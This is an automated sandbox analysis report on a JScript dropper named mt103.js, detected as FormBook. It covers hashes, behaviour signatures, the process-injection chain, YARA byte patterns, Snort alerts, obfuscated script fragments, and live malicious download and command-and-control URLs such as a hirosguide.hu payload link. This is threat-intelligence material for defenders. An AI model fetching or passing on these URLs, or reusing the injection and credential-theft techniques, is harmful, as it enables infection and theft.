Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
mt103.js

Overview

General Information

Sample Name:mt103.js
Analysis ID:794331
MD5:aef9d0a0d6eb0f1acc61c9fef31df227
SHA1:8ab951947dfa34a70ed7aeea10b7662b481049f0
SHA256:4bfa87d48d207b7b0a04112356e6bebe73ebc8f817bb0f940ef0b1aa5f2a2c4d
Tags:js
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
JScript performs obfuscated calls to suspicious functions
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
JavaScript source code contains functionality to generate code involving a shell, file or stream
Maps a DLL or memory area into another process
Writes to foreign memory regions
Allocates memory in foreign processes
Injects a PE file into a foreign processes
.NET source code contains method to dynamically call methods (often used by packers)
Queues an APC in another process (thread injection)
JavaScript source code contains functionality to generate code involving HTTP requests or file downloads
Deletes itself after installation
Potential obfuscated javascript found
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Connects to several IPs in different countries
Binary contains a suspicious time stamp
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 1680 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\mt103.js" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • HBhG.exe (PID: 5928 cmdline: "C:\Users\user\AppData\Local\Temp\HBhG.exe" MD5: 02DF8C86345D056735FA60116B93ED2B)
      • CasPol.exe (PID: 5720 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe MD5: F866FC1C2E928779C7119353C3091F0C)
        • explorer.exe (PID: 3452 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • control.exe (PID: 4804 cmdline: C:\Windows\SysWOW64\control.exe MD5: 40FBA3FBFD5E33E0DE1BA45472FDA66F)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
mt103.jsSUSP_obfuscated_JS_obfuscatorioDetects JS obfuscation done by the js obfuscator (often malicious)@imp0rtp3
  • 0x85:$c8: while(!![])
  • 0xaee:$c8: while(!![])
  • 0xa4:$d1: parseInt(_0x399b45(0x19e))/0x1+-parseInt(_0x399b45(0x1af))/0x2+parseInt(_0x399b45(0x188))/0x3*(-parseInt(_0x399b45(0x185))/0x4)+-parseInt(_0x399b45(0x1a3))/0x5+-parseInt(_0x399b45(0x171))/0x6*(

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.396764487.00000000012A0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000009.00000002.396764487.00000000012A0000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x1f010:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0xae3f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    • 0x18237:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
    00000009.00000002.396764487.00000000012A0000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x18035:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x17ad1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x18137:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x182af:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xaa0a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x16d1c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x1ddb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ed6a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000B.00000002.781120251.0000000000870000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000000B.00000002.781120251.0000000000870000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x1f010:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xae3f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x18237:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      Click to see the 10 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      9.2.CasPol.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        9.2.CasPol.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
        • 0x20043:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0xbe72:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        • 0x1926a:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
        9.2.CasPol.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x19068:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x18b04:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x1916a:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x192e2:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xba3d:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x17d4f:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x1edea:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1fd9d:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        9.2.CasPol.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          9.2.CasPol.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x20e43:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0xcc72:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x1a06a:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          Click to see the 1 entries

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          Timestamp:192.168.2.6184.94.215.9149731802031412 01/30/23-13:40:47.278994
          SID:2031412
          Source Port:49731
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.6184.94.215.9149731802031449 01/30/23-13:40:47.278994
          SID:2031449
          Source Port:49731
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.6184.94.215.9149731802031453 01/30/23-13:40:47.278994
          SID:2031453
          Source Port:49731
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Multi AV Scanner detection for submitted file
          Source: mt103.jsReversingLabs: Detection: 23%
          Source: mt103.jsVirustotal: Detection: 29%Perma Link
          Yara detected FormBook
          Source: Yara matchFile source: 9.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000009.00000002.396764487.00000000012A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.781120251.0000000000870000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.779545324.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.781365309.00000000008A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.396370553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Antivirus detection for URL or domain
          Source: http://www.frogair.online/crhz/?vG=iycDOFv4tLFlCihz1M/bkpzttTI3wOwIoAcOv31GIYKsRKZ8f8EzkP6Z56SPUyztaOnMa+iauXtsUeY/SnJCIVqiEyUfq8kF6FnqNv3PiNZk&s91Fd8=b8xjX_Avira URL Cloud: Label: malware
          Source: http://www.laylaroseuk.com/crhz/?vG=1rNCCz7kTcLTieqVkhzplJgcoI94HvPGoNH0lVnmkmFXwmlt9jZmgzPB/kdX+WOK+rGt5Wg7VkzKMCVbaV5wfyZJWCK5Z18H2VF/y4/Kognk&s91Fd8=b8xjX_Avira URL Cloud: Label: malware
          Source: http://www.teammart.online/crhz/?vG=4Z6KAxgBWslvyWQs2zz1LTCSIJZnXz/Wr59nnN1quAvIIyJUwPyWYoHYYm82bfT5dpIzg2ZgrTpqnEgpaKo3IMTbbHn1kxCLU7tvpznsmq41&s91Fd8=b8xjX_Avira URL Cloud: Label: malware
          Source: http://www.hayuterce.com/crhz/Avira URL Cloud: Label: malware
          Source: http://www.sandpiper-apts.com/crhz/?vG=LNHYCELR2jrkl6ex9ablCycu9h3K7h+sZB96ERWJZAieoidRiLebg6j0RcHsFDDJ9r29OHFtYH9IplqsElTHfTI2iz39I/8+/5l0mHu4niU0&s91Fd8=b8xjX_Avira URL Cloud: Label: malware
          Source: http://www.hvlandscapes.biz/crhz/Avira URL Cloud: Label: malware
          Source: http://www.frogair.online/crhz/Avira URL Cloud: Label: malware
          Source: http://www.sandpiper-apts.com/crhz/Avira URL Cloud: Label: malware
          Source: http://www.mitsubangsaen.online/crhz/Avira URL Cloud: Label: malware
          Source: http://www.teammart.online/crhz/Avira URL Cloud: Label: malware
          Source: https://hirosguide.hu/ti/HBhG.exeAvira URL Cloud: Label: malware
          Source: http://www.hvlandscapes.biz/crhz/?vG=tmPv/9YflmeFyaovhpy86TX5rNY2iNLCfFTw46C4YL4FjsvtgGKrRmf5O7NIQw/qRR8QJqKEWoluew4y5+XfIT1Onmlscs+4wa7bdRvmZkTM&s91Fd8=b8xjX_Avira URL Cloud: Label: malware
          Source: http://www.suachuadienlanh247.com/crhz/Avira URL Cloud: Label: malware
          Source: http://www.mitsubangsaen.online/crhz/?vG=nqmZBp2BkKhv5XD7JtliHBtb5J/nACgDXsCawcooXFLLWI2M3W+/ErAqTridlmxSnsXQQ5N94lpVUeLYPOpWHcmhsJP5m/P/TeGXz1gc+4vL&s91Fd8=b8xjX_Avira URL Cloud: Label: malware
          Multi AV Scanner detection for domain / URL
          Source: hirosguide.huVirustotal: Detection: 14%Perma Link
          Antivirus detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\HBhG.exeAvira: detection malicious, Label: HEUR/AGEN.1203876
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\HBhG[1].exeAvira: detection malicious, Label: HEUR/AGEN.1203876
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\HBhG[1].exeReversingLabs: Detection: 55%
          Source: C:\Users\user\AppData\Local\Temp\HBhG.exeReversingLabs: Detection: 55%
          Machine Learning detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\HBhG.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\HBhG[1].exeJoe Sandbox ML: detected
          Source: 9.2.CasPol.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: unknownHTTPS traffic detected: 91.227.138.48:443 -> 192.168.2.6:49714 version: TLS 1.2
          Source: Binary string: wntdll.pdbUGP source: CasPol.exe, 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, CasPol.exe, 00000009.00000003.357027677.0000000001565000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000009.00000003.354954352.00000000013C9000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: control.pdb source: CasPol.exe, 00000009.00000002.398224491.00000000032B0000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: CasPol.exe, CasPol.exe, 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, CasPol.exe, 00000009.00000003.357027677.0000000001565000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000009.00000003.354954352.00000000013C9000.00000004.00000020.00020000.00000000.sdmp, control.exe
          Source: Binary string: control.pdbUGP source: CasPol.exe, 00000009.00000002.398224491.00000000032B0000.00000040.10000000.00040000.00000000.sdmp
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_005031A0 FindFirstFileW,FindNextFileW,FindClose,11_2_005031A0

          Software Vulnerabilities

          barindex
          JavaScript source code contains functionality to generate code involving a shell, file or stream
          Source: mt103.jsReturn value : ['ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSGpcIKnHWPun,24cwPSlC,W5hdPKP/WRyhD3VcSSkO', 'WO41qK7cRvBcISoBWQBcVJxcMW,536561IZdlNV,ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSG', '536561IZdlNV,ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSGpcIKnHWPun,24cwPSlC,W5hdPKP']Go to definition
          Source: mt103.jsReturn value : ['ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSGpcIKnHWPun,24cwPSlC,W5hdPKP/WRyhD3VcSSkO', 'ymkUWO3cOMS,EmosWRVcNSolFa1ihmofWPhcNa,150UECBKi,W7lcSCkiWOzfa8oxWR5MF8kvWO7dKZu,3428070zJPwOJ,push,', 'WO41qK7cRvBcISoBWQBcVJxcMW,536561IZdlNV,ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSG', '536561IZdlNV,ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSGpcIKnHWPun,24cwPSlC,W5hdPKP']Go to definition
          Source: mt103.jsReturn value : ['ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSGpcIKnHWPun,24cwPSlC,W5hdPKP/WRyhD3VcSSkO', 'ymkUWO3cOMS,EmosWRVcNSolFa1ihmofWPhcNa,150UECBKi,W7lcSCkiWOzfa8oxWR5MF8kvWO7dKZu,3428070zJPwOJ,push,', 'WO41qK7cRvBcISoBWQBcVJxcMW,536561IZdlNV,ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSG', '536561IZdlNV,ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSGpcIKnHWPun,24cwPSlC,W5hdPKP']Go to definition
          Source: mt103.jsReturn value : ['ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSGpcIKnHWPun,24cwPSlC,W5hdPKP/WRyhD3VcSSkO', 'ymkUWO3cOMS,EmosWRVcNSolFa1ihmofWPhcNa,150UECBKi,W7lcSCkiWOzfa8oxWR5MF8kvWO7dKZu,3428070zJPwOJ,push,', 'EmosWRVcNSolFa1ihmofWPhcNa,150UECBKi,W7lcSCkiWOzfa8oxWR5MF8kvWO7dKZu,3428070zJPwOJ,push,460031zEcYIe', 'WO41qK7cRvBcISoBWQBcVJxcMW,536561IZdlNV,ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSG', '536561IZdlNV,ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSGpcIKnHWPun,24cwPSlC,W5hdPKP']Go to definition
          Source: mt103.jsReturn value : ['ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSGpcIKnHWPun,24cwPSlC,W5hdPKP/WRyhD3VcSSkO', 'ymkUWO3cOMS,EmosWRVcNSolFa1ihmofWPhcNa,150UECBKi,W7lcSCkiWOzfa8oxWR5MF8kvWO7dKZu,3428070zJPwOJ,push,', 'EmosWRVcNSolFa1ihmofWPhcNa,150UECBKi,W7lcSCkiWOzfa8oxWR5MF8kvWO7dKZu,3428070zJPwOJ,push,460031zEcYIe', 'WO41qK7cRvBcISoBWQBcVJxcMW,536561IZdlNV,ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSG', '536561IZdlNV,ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSGpcIKnHWPun,24cwPSlC,W5hdPKP']Go to definition
          Source: mt103.jsReturn value : ['ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSGpcIKnHWPun,24cwPSlC,W5hdPKP/WRyhD3VcSSkO', 'ymkUWO3cOMS,EmosWRVcNSolFa1ihmofWPhcNa,150UECBKi,W7lcSCkiWOzfa8oxWR5MF8kvWO7dKZu,3428070zJPwOJ,push,', 'EmosWRVcNSolFa1ihmofWPhcNa,150UECBKi,W7lcSCkiWOzfa8oxWR5MF8kvWO7dKZu,3428070zJPwOJ,push,460031zEcYIe', 'WO41qK7cRvBcISoBWQBcVJxcMW,536561IZdlNV,ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSG', '536561IZdlNV,ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSGpcIKnHWPun,24cwPSlC,W5hdPKP']Go to definition
          Source: mt103.jsReturn value : ['"Shell.Application"', 'ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSGpcIKnHWPun,24cwPSlC,W5hdPKP/WRyhD3VcSSkO', 'ymkUWO3cOMS,EmosWRVcNSolFa1ihmofWPhcNa,150UECBKi,W7lcSCkiWOzfa8oxWR5MF8kvWO7dKZu,3428070zJPwOJ,push,', 'EmosWRVcNSolFa1ihmofWPhcNa,150UECBKi,W7lcSCkiWOzfa8oxWR5MF8kvWO7dKZu,3428070zJPwOJ,push,460031zEcYIe', '"Scripting.FileSystemObject"', 'WO41qK7cRvBcISoBWQBcVJxcMW,536561IZdlNV,ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSG', '"SaveToFile"', '536561IZdlNV,ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSGpcIKnHWPun,24cwPSlC,W5hdPKP']Go to definition
          Source: mt103.jsArgument value : ['"Shell.Application"', 'ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSGpcIKnHWPun,24cwPSlC,W5hdPKP/WRyhD3VcSSkO', 'ymkUWO3cOMS,EmosWRVcNSolFa1ihmofWPhcNa,150UECBKi,W7lcSCkiWOzfa8oxWR5MF8kvWO7dKZu,3428070zJPwOJ,push,', 'EmosWRVcNSolFa1ihmofWPhcNa,150UECBKi,W7lcSCkiWOzfa8oxWR5MF8kvWO7dKZu,3428070zJPwOJ,push,460031zEcYIe', '"Scripting.FileSystemObject"', 'WO41qK7cRvBcISoBWQBcVJxcMW,536561IZdlNV,ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSG', '"SaveToFile"', '"Shell.Application","NnEE"', '536561IZdlNV,ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSGpcIKnHWPun,24cwPSlC,W5hdPKP']Go to definition
          Source: mt103.jsReturn value : ['"Shell.Application"', 'ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSGpcIKnHWPun,24cwPSlC,W5hdPKP/WRyhD3VcSSkO', 'ymkUWO3cOMS,EmosWRVcNSolFa1ihmofWPhcNa,150UECBKi,W7lcSCkiWOzfa8oxWR5MF8kvWO7dKZu,3428070zJPwOJ,push,', 'EmosWRVcNSolFa1ihmofWPhcNa,150UECBKi,W7lcSCkiWOzfa8oxWR5MF8kvWO7dKZu,3428070zJPwOJ,push,460031zEcYIe', '"Scripting.FileSystemObject"', 'WO41qK7cRvBcISoBWQBcVJxcMW,536561IZdlNV,ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSG', '"SaveToFile"', '"Shell.Application","NnEE"', '"ADODB.Stream"', '536561IZdlNV,ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSGpcIKnHWPun,24cwPSlC,W5hdPKP']Go to definition
          Source: mt103.jsArgument value : ['"Shell.Application"', 'ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSGpcIKnHWPun,24cwPSlC,W5hdPKP/WRyhD3VcSSkO', 'ymkUWO3cOMS,EmosWRVcNSolFa1ihmofWPhcNa,150UECBKi,W7lcSCkiWOzfa8oxWR5MF8kvWO7dKZu,3428070zJPwOJ,push,', 'EmosWRVcNSolFa1ihmofWPhcNa,150UECBKi,W7lcSCkiWOzfa8oxWR5MF8kvWO7dKZu,3428070zJPwOJ,push,460031zEcYIe', '"Scripting.FileSystemObject"', 'WO41qK7cRvBcISoBWQBcVJxcMW,536561IZdlNV,ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSG', '"SaveToFile"', '"Shell.Application","NnEE"', '"ADODB.Stream"', '536561IZdlNV,ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSGpcIKnHWPun,24cwPSlC,W5hdPKP']Go to definition
          Source: mt103.jsReturn value : ['"Shell.Application"', 'ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSGpcIKnHWPun,24cwPSlC,W5hdPKP/WRyhD3VcSSkO', 'ymkUWO3cOMS,EmosWRVcNSolFa1ihmofWPhcNa,150UECBKi,W7lcSCkiWOzfa8oxWR5MF8kvWO7dKZu,3428070zJPwOJ,push,', 'EmosWRVcNSolFa1ihmofWPhcNa,150UECBKi,W7lcSCkiWOzfa8oxWR5MF8kvWO7dKZu,3428070zJPwOJ,push,460031zEcYIe', '"Scripting.FileSystemObject"', 'WO41qK7cRvBcISoBWQBcVJxcMW,536561IZdlNV,ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSG', '"SaveToFile"', '"Shell.Application","NnEE"', '"ADODB.Stream"', '536561IZdlNV,ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSGpcIKnHWPun,24cwPSlC,W5hdPKP']Go to definition
          Source: mt103.jsReturn value : ['"Shell.Application"', 'ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSGpcIKnHWPun,24cwPSlC,W5hdPKP/WRyhD3VcSSkO', 'ymkUWO3cOMS,EmosWRVcNSolFa1ihmofWPhcNa,150UECBKi,W7lcSCkiWOzfa8oxWR5MF8kvWO7dKZu,3428070zJPwOJ,push,', 'EmosWRVcNSolFa1ihmofWPhcNa,150UECBKi,W7lcSCkiWOzfa8oxWR5MF8kvWO7dKZu,3428070zJPwOJ,push,460031zEcYIe', '"Scripting.FileSystemObject"', 'WO41qK7cRvBcISoBWQBcVJxcMW,536561IZdlNV,ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSG', '"SaveToFile"', '"Shell.Application","NnEE"', '"ADODB.Stream"', '536561IZdlNV,ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSGpcIKnHWPun,24cwPSlC,W5hdPKP']Go to definition
          Source: mt103.jsReturn value : ['"Shell.Application"', 'ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSGpcIKnHWPun,24cwPSlC,W5hdPKP/WRyhD3VcSSkO', 'ymkUWO3cOMS,EmosWRVcNSolFa1ihmofWPhcNa,150UECBKi,W7lcSCkiWOzfa8oxWR5MF8kvWO7dKZu,3428070zJPwOJ,push,', 'EmosWRVcNSolFa1ihmofWPhcNa,150UECBKi,W7lcSCkiWOzfa8oxWR5MF8kvWO7dKZu,3428070zJPwOJ,push,460031zEcYIe', '"Scripting.FileSystemObject"', 'WO41qK7cRvBcISoBWQBcVJxcMW,536561IZdlNV,ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSG', '"SaveToFile"', '"Shell.Application","NnEE"', '"ADODB.Stream"', '536561IZdlNV,ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSGpcIKnHWPun,24cwPSlC,W5hdPKP']Go to definition
          Source: mt103.jsReturn value : ['"Shell.Application"', 'ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSGpcIKnHWPun,24cwPSlC,W5hdPKP/WRyhD3VcSSkO', 'ymkUWO3cOMS,EmosWRVcNSolFa1ihmofWPhcNa,150UECBKi,W7lcSCkiWOzfa8oxWR5MF8kvWO7dKZu,3428070zJPwOJ,push,', 'EmosWRVcNSolFa1ihmofWPhcNa,150UECBKi,W7lcSCkiWOzfa8oxWR5MF8kvWO7dKZu,3428070zJPwOJ,push,460031zEcYIe', '"Scripting.FileSystemObject"', 'WO41qK7cRvBcISoBWQBcVJxcMW,536561IZdlNV,ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSG', '"SaveToFile"', '"Shell.Application","NnEE"', '"ADODB.Stream"', '536561IZdlNV,ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSGpcIKnHWPun,24cwPSlC,W5hdPKP']Go to definition
          Source: mt103.jsReturn value : ['"Shell.Application"', 'ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSGpcIKnHWPun,24cwPSlC,W5hdPKP/WRyhD3VcSSkO', 'ymkUWO3cOMS,EmosWRVcNSolFa1ihmofWPhcNa,150UECBKi,W7lcSCkiWOzfa8oxWR5MF8kvWO7dKZu,3428070zJPwOJ,push,', 'EmosWRVcNSolFa1ihmofWPhcNa,150UECBKi,W7lcSCkiWOzfa8oxWR5MF8kvWO7dKZu,3428070zJPwOJ,push,460031zEcYIe', '"Scripting.FileSystemObject"', 'WO41qK7cRvBcISoBWQBcVJxcMW,536561IZdlNV,ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSG', '"SaveToFile"', '"Shell.Application","NnEE"', '"ADODB.Stream"', '536561IZdlNV,ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSGpcIKnHWPun,24cwPSlC,W5hdPKP']Go to definition
          Source: mt103.jsReturn value : ['"Shell.Application"', 'ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSGpcIKnHWPun,24cwPSlC,W5hdPKP/WRyhD3VcSSkO', 'ymkUWO3cOMS,EmosWRVcNSolFa1ihmofWPhcNa,150UECBKi,W7lcSCkiWOzfa8oxWR5MF8kvWO7dKZu,3428070zJPwOJ,push,', 'EmosWRVcNSolFa1ihmofWPhcNa,150UECBKi,W7lcSCkiWOzfa8oxWR5MF8kvWO7dKZu,3428070zJPwOJ,push,460031zEcYIe', '"Scripting.FileSystemObject"', 'WO41qK7cRvBcISoBWQBcVJxcMW,536561IZdlNV,ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSG', '"SaveToFile"', '"Shell.Application","NnEE"', '"ADODB.Stream"', '536561IZdlNV,ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSGpcIKnHWPun,24cwPSlC,W5hdPKP']Go to definition
